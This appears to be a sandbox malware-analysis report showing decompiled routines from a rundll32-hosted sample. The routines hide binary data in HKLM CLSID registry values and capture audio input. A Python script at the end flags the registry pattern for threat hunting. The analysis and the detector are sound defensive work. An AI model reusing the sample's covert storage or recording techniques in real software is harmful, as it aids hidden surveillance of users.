                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CompareCompletionCreateEventExchangeInterlockedPortResetSwitchThreadbindclosesocketsocket
                                                            • String ID:
                                                            • API String ID: 1231050892-0
                                                            • Opcode ID: 5586ba6d338ac3112a3e9bc8bdf08269ae539ae1c564c23f6c29ab9ec25237a9
                                                            • Instruction ID: f3fe8bedff61432ffa675e4be340e9bb91c4f4c2297e3d2b2ed560f002ffb0a9
                                                            • Opcode Fuzzy Hash: 5586ba6d338ac3112a3e9bc8bdf08269ae539ae1c564c23f6c29ab9ec25237a9
                                                            • Instruction Fuzzy Hash: 40218E35200602ABD714AFB9E8587D9FBA8FF54324F044166E909C6690EBB5B864CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E04646B70(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				char _v616;
                                                            				int _v620;
                                                            				int _v624;
                                                            				signed int _t20;
                                                            				signed int _t52;
                                                            
                                                            				_t20 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t20 ^ _t52;
                                                            				_v616 = 0;
                                                            				_v620 = 4;
                                                            				E04646050(__ebx, L"SEOID",  &_v88, __edi, __esi);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				E0465DEA0(__edi,  &_v616, 0, _v620);
                                                            				_v612 = 0;
                                                             				// HKEY_LOCAL_MACHINE, access 0x20119 = KEY_READ | KEY_WOW64_64KEY (reads the 64-bit view even from a 32-bit process)
                                                             				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                            					L3:
                                                            					return E04655AFE(_v8 ^ _t52);
                                                            				} else {
                                                             					// value name rendered as "1" by the decompiler (pointer 0467E09C in the API list); reads at most 4 bytes (_v620 = 4) into _v616
                                                             					RegQueryValueExW(_v612, "1", 0,  &_v624,  &_v616,  &_v620);
                                                             					// the decompiler did not recover the operands of the two comparisons below; the result decides the return path
                                                             					_t51 =  ==  ? 1 : 0;
                                                             					RegCloseKey(_v612);
                                                             					_t58 =  ==  ? 1 : 0;
                                                             					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						return E04655AFE(_v8 ^ _t52);
                                                            					}
                                                            				}
                                                            			}












Address gutter of the E04646B70 listing above (one address per decompiled line, in listing order; 0x00000000 marks the goto line with no instruction): 0x04646b79, 0x04646b80, 0x04646b87, 0x04646b96, 0x04646ba0, 0x04646bb5, 0x04646bcb, 0x04646bd3, 0x04646bfa, 0x04646c52, 0x04646c62, 0x04646bfc, 0x04646c1d, 0x04646c30, 0x04646c33, 0x04646c39, 0x04646c3b, 0x00000000, 0x04646c3d, 0x04646c51, 0x04646c51, 0x04646c3b

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 04646BB5
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04646BF2
                                                            • RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,?,?), ref: 04646C1D
                                                            • RegCloseKey.ADVAPI32(?), ref: 04646C33
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue$wsprintf
                                                            • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3615287298-3437544703
                                                            • Opcode ID: 2a08624b13842f946e630a6985c9b88d14a56c6875e0b6e7505d7351fe6d5b45
                                                            • Instruction ID: 390ad786691ce04731bc0658bb6d339145cd632f40d076fff8dcf5b0feb987d4
                                                            • Opcode Fuzzy Hash: 2a08624b13842f946e630a6985c9b88d14a56c6875e0b6e7505d7351fe6d5b45
                                                            • Instruction Fuzzy Hash: D521127290522CABDB20EFA0DD4CBEAB7BCEF44600F0001D9A90AA6115FA365E44CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E04644790(WCHAR* __ecx, WCHAR* __edx, void* __esi) {
                                                            				signed int _v0;
                                                            				signed int _v8;
                                                            				struct _SYSTEMTIME _v24;
                                                            				struct _SYSTEMTIME _v40;
                                                            				struct _FILETIME _v48;
                                                            				struct _FILETIME _v56;
                                                            				struct _FILETIME _v64;
                                                            				signed int _t16;
                                                            				WCHAR* _t45;
                                                            				signed int _t48;
                                                            
                                                            				_t50 = (_t48 & 0xfffffff8) - 0x3c;
                                                            				_t16 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t16 ^ (_t48 & 0xfffffff8) - 0x0000003c;
                                                            				_t45 = __edx;
                                                            				if(GetFileTime(CreateFileW(__ecx, 0, 1, 0, 3, 0x80, 0),  &_v64,  &_v48,  &_v56) != 0) {
                                                            					FileTimeToSystemTime( &_v64,  &_v24);
                                                            					SystemTimeToTzSpecificLocalTime(0,  &_v24,  &_v40);
                                                            					wsprintfW(_t45, L"%04d-%02d-%02d  %02d:%02d", _v40.wYear & 0x0000ffff, _v40.wMonth & 0x0000ffff, _v40.wDay & 0x0000ffff, _v40.wHour & 0x0000ffff, _v40.wMinute & 0x0000ffff);
                                                            					return E04655AFE(_v0 ^ _t50 + 0x0000001c);
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t50);
                                                            				}
                                                            			}

                                                            APIs
                                                            • CreateFileW.KERNEL32(-00000220,00000000,00000001,00000000,00000003,00000080,00000000,00000012), ref: 046447B7
                                                            • GetFileTime.KERNEL32(00000000,?,?,?), ref: 046447CD
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 046447F1
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 04644803
                                                            • wsprintfW.USER32 ref: 0464482D
                                                            Strings
                                                            • %04d-%02d-%02d %02d:%02d, xrefs: 04644827
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$File$System$CreateLocalSpecificwsprintf
                                                            • String ID: %04d-%02d-%02d %02d:%02d
                                                            • API String ID: 4290651727-1132360693
                                                            • Opcode ID: a190f5a9679de7201290cd73bae3ce9e4d5873dadc3cafff6923fbcca527a927
                                                            • Instruction ID: 3d75acccba8d9d0eff7d05e6fedf74ed705b4bc2e2b69435470a8ebb74fb72ea
                                                            • Opcode Fuzzy Hash: a190f5a9679de7201290cd73bae3ce9e4d5873dadc3cafff6923fbcca527a927
                                                            • Instruction Fuzzy Hash: 7C117F72108300AFD3549B64DC4AFBB77ECEB88725F00060EF99AD61D0FA68E944C766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04631550(intOrPtr _a4) {
                                                            				struct tagMSG _v32;
                                                            				intOrPtr _t19;
                                                            				signed int _t30;
                                                            				intOrPtr _t34;
                                                            
                                                            				if(GetMessageW( &_v32, 0, 0, 0) == 0) {
                                                            					L7:
                                                            					return 0;
                                                            				} else {
                                                            					_t34 = _a4;
                                                            					do {
                                                            						_t19 = _v32.message;
                                                            						if(_t19 != 0x3c0) {
                                                            							L5:
                                                            							if(_t19 == 0x3bf) {
                                                            								goto L7;
                                                            							} else {
                                                            								goto L6;
                                                            							}
                                                            						} else {
                                                            							SetEvent( *(_t34 + 0x24));
                                                            							WaitForSingleObject( *(_t34 + 0x28), 0xffffffff);
                                                            							 *((intOrPtr*)(_t34 + 0x1c)) = 1;
                                                            							_t30 = waveInAddBuffer( *(_t34 + 0x18),  *(_t34 + 0x30 + (1 -  *((intOrPtr*)(_t34 + 0x1c))) * 4), 0x20);
                                                            							if(_t30 != 0) {
                                                            								return _t30 | 0xffffffff;
                                                            							} else {
                                                            								_t19 = _v32.message;
                                                            								goto L5;
                                                            							}
                                                            						}
                                                            						goto L9;
                                                            						L6:
                                                            						TranslateMessage( &_v32);
                                                            						DispatchMessageW( &_v32);
                                                            					} while (GetMessageW( &_v32, 0, 0, 0) != 0);
                                                            					goto L7;
                                                            				}
                                                            				L9:
                                                            			}

                                                            APIs
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 04631569
                                                            • SetEvent.KERNEL32(?), ref: 0463158D
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04631598
                                                            • waveInAddBuffer.WINMM(?,?,00000020), ref: 046315B2
                                                            • TranslateMessage.USER32(?), ref: 046315CA
                                                            • DispatchMessageW.USER32(?), ref: 046315D0
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 046315E0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
                                                            • String ID:
                                                            • API String ID: 3294988761-0
                                                            • Opcode ID: 2033b0f47881e5d892c5c73b7444e84df343140752aeef42a6ea8206c99fe51d
                                                            • Instruction ID: bd1ce597cce805962bbc2dee80050e572d8401147b9bae120c93247d017b2e57
                                                            • Opcode Fuzzy Hash: 2033b0f47881e5d892c5c73b7444e84df343140752aeef42a6ea8206c99fe51d
                                                            • Instruction Fuzzy Hash: 08118672A403099BDB20DFA9EC49FAAB7B8EB05731F101625F615D61D0FB35F9118B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E04647C90(void* __ecx, signed char* _a4) {
                                                            				void* _t22;
                                                            				intOrPtr _t23;
                                                            				void* _t28;
                                                            				intOrPtr* _t31;
                                                            				intOrPtr _t32;
                                                            
                                                            				_t28 = __ecx;
                                                            				_t22 = ( *_a4 & 0x000000ff) + 0xffffffe1;
                                                            				if(_t22 > 0x5c) {
                                                            					L7:
                                                            					_t23 =  *((intOrPtr*)(_t28 + 4));
                                                            					_t31 =  *((intOrPtr*)(_t23 + 0x20));
                                                            					 *(_t23 + 0x44) = 1;
                                                            					if(_t31 != 0) {
                                                            						L10:
                                                            						return  *((intOrPtr*)( *_t31 + 4))();
                                                            					}
                                                            					_t32 =  *((intOrPtr*)(_t23 + 0x24));
                                                            					if(_t32 != 0) {
                                                            						_t31 = _t32 + 4;
                                                            						goto L10;
                                                            					}
                                                            					return _t23;
                                                            				} else {
                                                            					switch( *((intOrPtr*)(( *(_t22 + 0x4647d70) & 0x000000ff) * 4 +  &M04647D58))) {
                                                            						case 0:
                                                            							__eax = __ebx + 0xec;
                                                            							__eax = InterlockedExchange(__ebx + 0xec, 1);
                                                            							 *((intOrPtr*)(__ebx + 0xe8)) = 0x3f;
                                                            							return __eax;
                                                            							goto L12;
                                                            						case 1:
                                                            							__eax = __ebx + 0xec;
                                                            							__eax = InterlockedExchange(__ebx + 0xec, 0);
                                                            							 *((intOrPtr*)(__ebx + 0xe8)) = 0x1f;
                                                            							return __eax;
                                                            							goto L12;
                                                            						case 2:
                                                            							_push(__edi);
                                                            							__edi =  *(__ecx + 5);
                                                            							__ebx + 0x10 = InterlockedExchange(__ebx + 0x10,  *(__ecx + 1));
                                                            							__eax = __ebx + 0x14;
                                                            							__eax = InterlockedExchange(__ebx + 0x14, __edi);
                                                            							_pop(__edi);
                                                            							return __eax;
                                                            							goto L12;
                                                            						case 3:
                                                            							__eax =  *(__ecx + 1);
                                                            							 *(__ebx + 0xf4) = __eax;
                                                            							return __eax;
                                                            							goto L12;
                                                            						case 4:
                                                            							return SetEvent( *(__ecx + 0x18));
                                                            							goto L12;
                                                            						case 5:
                                                            							goto L7;
                                                            					}
                                                            				}
                                                            				L12:
                                                            			}

                                                            APIs
                                                            • SetEvent.KERNEL32(?), ref: 04647CB9
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 04647CCF
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 04647CDA
                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 04647CEF
                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 04647D0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExchangeInterlocked$Event
                                                            • String ID: ?
                                                            • API String ID: 767157976-1684325040
                                                            • Opcode ID: e4268ed00c6781f87c23f78a44e4d521ab84ffc20e903d138d0a89fcaf91aecb
                                                            • Instruction ID: d070b01e0f4edb24bc91b8ba0a90a3babc4bb6502d74f7e8c4b37551d80a8cc3
                                                            • Opcode Fuzzy Hash: e4268ed00c6781f87c23f78a44e4d521ab84ffc20e903d138d0a89fcaf91aecb
                                                            • Instruction Fuzzy Hash: AC216076104104CFDB04DF60E8C8FA67BA8FB98315F1485ABE90A8F252D737D421DB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0466C196(intOrPtr _a4) {
                                                            				void* _t18;
                                                            				intOrPtr _t45;
                                                            
                                                            				_t45 = _a4;
                                                            				if(_t45 != 0) {
                                                            					E0466C15A(_t45, 7);
                                                            					_t2 = _t45 + 0x1c; // 0x1d
                                                            					E0466C15A(_t2, 7);
                                                            					_t3 = _t45 + 0x38; // 0x39
                                                            					E0466C15A(_t3, 0xc);
                                                            					_t4 = _t45 + 0x68; // 0x69
                                                            					E0466C15A(_t4, 0xc);
                                                            					_t5 = _t45 + 0x98; // 0x99
                                                            					E0466C15A(_t5, 2);
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0xa0)));
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0xa4)));
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0xa8)));
                                                            					_t9 = _t45 + 0xb4; // 0xb5
                                                            					E0466C15A(_t9, 7);
                                                            					_t10 = _t45 + 0xd0; // 0xd1
                                                            					E0466C15A(_t10, 7);
                                                            					_t11 = _t45 + 0xec; // 0xed
                                                            					E0466C15A(_t11, 0xc);
                                                            					_t12 = _t45 + 0x11c; // 0x11d
                                                            					E0466C15A(_t12, 0xc);
                                                            					_t13 = _t45 + 0x14c; // 0x14d
                                                            					E0466C15A(_t13, 2);
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0x154)));
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0x158)));
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0x15c)));
                                                            					return E046684AD( *((intOrPtr*)(_t45 + 0x160)));
                                                            				}
                                                            				return _t18;
                                                            			}

                                                             Instruction addresses: 0x0466c19c, 0x0466c1a1, 0x0466c1aa, 0x0466c1af, 0x0466c1b5, 0x0466c1ba, 0x0466c1c0, 0x0466c1c5, 0x0466c1cb, 0x0466c1d0, 0x0466c1d9, 0x0466c1e4, 0x0466c1ef, 0x0466c1fa, 0x0466c1ff, 0x0466c208, 0x0466c20d, 0x0466c216, 0x0466c21e, 0x0466c227, 0x0466c22c, 0x0466c235, 0x0466c23a, 0x0466c243, 0x0466c24e, 0x0466c259, 0x0466c264, 0x00000000, 0x0466c274, 0x0466c279

                                                            APIs
                                                              • Part of subcall function 0466C15A: _free.LIBCMT ref: 0466C183
                                                            • _free.LIBCMT ref: 0466C1E4
                                                              • Part of subcall function 046684AD: HeapFree.KERNEL32(00000000,00000000,?,046612C5,00000001,00000001), ref: 046684C3
                                                              • Part of subcall function 046684AD: GetLastError.KERNEL32(D355BE4E,?,046612C5,00000001,00000001), ref: 046684D5
                                                            • _free.LIBCMT ref: 0466C1EF
                                                            • _free.LIBCMT ref: 0466C1FA
                                                            • _free.LIBCMT ref: 0466C24E
                                                            • _free.LIBCMT ref: 0466C259
                                                            • _free.LIBCMT ref: 0466C264
                                                            • _free.LIBCMT ref: 0466C26F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: f0a7334c6dbb5677564b686ea8814ec6d71082e467f4995945020664cc9d3a81
                                                            • Instruction ID: a2f6c9238f0f62ddb743e20be2b155abf62ddee3718cbc8a312b1d6c7a79669f
                                                            • Opcode Fuzzy Hash: f0a7334c6dbb5677564b686ea8814ec6d71082e467f4995945020664cc9d3a81
                                                            • Instruction Fuzzy Hash: 1E1124B2581F04AAF520B7B0CC45FDBBB9C6F04714F804C2DBBDB6A150E665B5054AA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E0463A080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				signed int _t14;
                                                            				intOrPtr* _t16;
                                                            				int _t26;
                                                            				intOrPtr _t32;
                                                            				void* _t37;
                                                            				int _t41;
                                                            				char* _t43;
                                                            				signed int _t44;
                                                            
                                                             				_t14 =  *0x4684008; // 0xd355be4e, the /GS security cookie; E04655AFE at the end is the cookie check
                                                             				_v8 = _t14 ^ _t44;
                                                             				_t43 = __ecx;
                                                             				_t16 = __ecx;
                                                             				_t37 = __ecx + 2;
                                                             				do { // inline wcslen over the caller-supplied UTF-16 buffer
                                                             					_t32 =  *_t16;
                                                             					_t16 = _t16 + 2;
                                                             				} while (_t32 != 0);
                                                             				_t41 = 2 + (_t16 - _t37 >> 1) * 2; // byte length including the terminating NUL: (wcslen + 1) * 2
                                                             				E046454D0(__ecx, _t41); // applied to the buffer and its length before it is stored; its effect is not resolved in this listing
                                                             				E04646050(__ebx, L"Global",  &_v88, _t41, __ecx); // fills _v88 with the subkey name used below (the subcall queries a registry value, see the APIs under E0463A150)
                                                             				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                             				_v612 = 0;
                                                             				_t26 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // 0x80000002 = HKEY_LOCAL_MACHINE, 0xf013f = KEY_ALL_ACCESS
                                                             				if(_t26 == 0) {
                                                             					RegSetValueExW(_v612, "3", _t26, 3, _t43, _t41); // value name "3", type 3 = REG_BINARY, data = the transformed buffer, _t41 bytes
                                                             					RegCloseKey(_v612);
                                                             				}
                                                             				return E04655AFE(_v8 ^ _t44);
                                                            			}

                                                             Instruction addresses: 0x0463a089, 0x0463a090, 0x0463a094, 0x0463a096, 0x0463a099, 0x0463a0a0, 0x0463a0a0, 0x0463a0a3, 0x0463a0a6, 0x0463a0b1, 0x0463a0ba, 0x0463a0c7, 0x0463a0dc, 0x0463a0e5, 0x0463a111, 0x0463a119, 0x0463a12b, 0x0463a137, 0x0463a137, 0x0463a14c

                                                            APIs
                                                            • wsprintfW.USER32 ref: 0463A0DC
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,00000000,00000000), ref: 0463A111
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E120,00000000,00000003), ref: 0463A12B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463A137
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValuewsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 4211343355-1865207932
                                                            • Opcode ID: 9ee14e5bb920020c2cecb6b3049bdecc3a6d3a767ccab5372d9da015b971ee7a
                                                            • Instruction ID: 09d15bf3f506afb4d18c7e166ec123de2264f02bb9ee8a35aebd312034f15dd8
                                                            • Opcode Fuzzy Hash: 9ee14e5bb920020c2cecb6b3049bdecc3a6d3a767ccab5372d9da015b971ee7a
                                                            • Instruction Fuzzy Hash: F5119331604218ABDB20DF94EC4DFAAB77CEB84701F004198F906EB280FB756E04DB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E0463A150(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				signed int _t14;
                                                            				char* _t20;
                                                            				int _t26;
                                                            				char _t33;
                                                            				char* _t38;
                                                            				int _t41;
                                                            				char* _t43;
                                                            				signed int _t44;
                                                            
                                                            				_t14 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t14 ^ _t44;
                                                            				_t43 = __ecx;
                                                             				E04646050(__ebx, L"Global",  &_v88, __edi, __ecx); // fills _v88 with the CLSID subkey name; the subcall builds it from a registry query (RegOpenKeyExW/RegQueryValueExW in the APIs below)
                                                             				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                             				_t20 = _t43;
                                                             				_t38 =  &(_t20[2]);
                                                             				do { // inline wcslen, as in E0463A080
                                                             					_t33 =  *_t20;
                                                             					_t20 =  &(_t20[2]);
                                                             				} while (_t33 != 0);
                                                             				_t41 = 2 + (_t20 - _t38 >> 1) * 2; // (wcslen + 1) * 2 bytes
                                                             				E046454D0(_t43, _t41);
                                                             				_v612 = 0;
                                                             				_t26 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // HKEY_LOCAL_MACHINE, KEY_ALL_ACCESS
                                                             				if(_t26 == 0) {
                                                             					RegSetValueExW(_v612, "2", _t26, 3, _t43, _t41); // same layout as E0463A080, but stored under value name "2" (type 3 = REG_BINARY)
                                                            					RegCloseKey(_v612);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t44);
                                                            			}

                                                             Instruction addresses: 0x0463a159, 0x0463a160, 0x0463a164, 0x0463a16f, 0x0463a184, 0x0463a18a, 0x0463a18f, 0x0463a192, 0x0463a192, 0x0463a195, 0x0463a198, 0x0463a1a3, 0x0463a1ac, 0x0463a1b9, 0x0463a1dd, 0x0463a1e5, 0x0463a1f7, 0x0463a203, 0x0463a203, 0x0463a218

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0463A184
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 0463A1DD
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E124,00000000,00000003), ref: 0463A1F7
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463A203
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1865207932
                                                            • Opcode ID: a23806e10f7cade3c55585005c9b52de227c844dac9180adab389953da987610
                                                            • Instruction ID: 69f8286725e0fa12e3bdc9ca043e390091215f944e4b2d2eea15fc1e1c1461aa
                                                            • Opcode Fuzzy Hash: a23806e10f7cade3c55585005c9b52de227c844dac9180adab389953da987610
                                                            • Instruction Fuzzy Hash: 7111B631600218ABDB20DF94DC4DFAAB37CEB84700F004199E906E7280FB756E04DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
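E0463A080 and E0463A150 above share one storage pattern: under HKLM\SOFTWARE\Classes\CLSID\<name> they create REG_BINARY values named "3" and "2" holding a transformed buffer. Genuine CLSID registrations carry a default value and subkeys such as InprocServer32 and rarely bare numeric REG_BINARY values, so the shape is a usable hunting lead. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses the text written by `reg export` and flags values of that shape. The .reg content is constructed; the second GUID and the byte payloads are invented for illustration, and nothing is assumed about the encoding E046454D0 applies.

```python
import re
from typing import Dict, List, Tuple

# Constructed `reg export` text (not from the report). The second CLSID key, its GUID and the
# byte payloads are hypothetical; only the value names "2"/"3", the REG_BINARY type and the
# HKLM\SOFTWARE\Classes\CLSID\<name> location come from the decompiled routines above.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000300-0000-0000-C000-000000000046}]
@="StdOleLink"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000300-0000-0000-C000-000000000046}\InprocServer32]
@="C:\\Windows\\System32\\ole32.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9f7c2b11-3a5e-4d2c-8e0b-1c4f5a6b7d8e}]
"3"=hex:5a,13,f0,0c,77,21,9e,00,00,00
"2"=hex:de,ad,be,ef,\
  00,11,22,33
"Count"=dword:00000002
'''

CLSID_ROOTS = (
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID',
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID',  # WOW64 view written by 32-bit code
)
SUSPICIOUS_VALUE_NAMES = {'2', '3'}

_KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
_VALUE_RE = re.compile(r'^(?:@|"(?P<name>(?:[^"\\]|\\.)*)")=(?P<data>.*)$')

RegValues = Dict[str, Tuple[str, bytes]]  # value name -> (type, payload)


def parse_reg_export(text: str) -> Dict[str, RegValues]:
    """Parse reg.exe export text into {key path: {value name: (type, payload)}}.

    REG_BINARY ("hex:") payloads are decoded, including reg.exe's backslash line
    continuations; other value types are kept with an empty payload.
    """
    lines = text.splitlines()
    keys: Dict[str, RegValues] = {}
    current = None
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        key_match = _KEY_RE.match(line)
        if key_match:
            current = key_match.group('key')
            keys.setdefault(current, {})
            continue
        value_match = _VALUE_RE.match(line)
        if not value_match or current is None:
            continue
        name = value_match.group('name')
        name = '@' if name is None else name.replace('\\"', '"').replace('\\\\', '\\')
        data = value_match.group('data')
        while data.endswith('\\') and i < len(lines):  # hex data continued on the next line
            data = data[:-1] + lines[i].strip()
            i += 1
        if data.startswith('hex:'):
            payload = bytes(int(b, 16) for b in data[4:].split(',') if b.strip())
            keys[current][name] = ('REG_BINARY', payload)
        elif data.startswith('dword:'):
            keys[current][name] = ('REG_DWORD', b'')
        elif data.startswith('hex('):
            keys[current][name] = ('REG_OTHER', b'')
        else:
            keys[current][name] = ('REG_SZ', b'')
    return keys


def find_suspicious_clsid_values(keys: Dict[str, RegValues]) -> List[Tuple[str, str, int]]:
    """Return (key, value name, payload length) for REG_BINARY values named "2" or "3"
    that sit directly on a CLSID\\{...} key, the shape written by E0463A080/E0463A150."""
    findings = []
    for key, values in keys.items():
        for root in CLSID_ROOTS:
            prefix = root.lower() + '\\'
            if not key.lower().startswith(prefix):
                continue
            if '\\' in key[len(prefix):]:  # InprocServer32 etc. are ordinary subkeys; skip them
                continue
            for name, (vtype, payload) in values.items():
                if name in SUSPICIOUS_VALUE_NAMES and vtype == 'REG_BINARY':
                    findings.append((key, name, len(payload)))
    return findings


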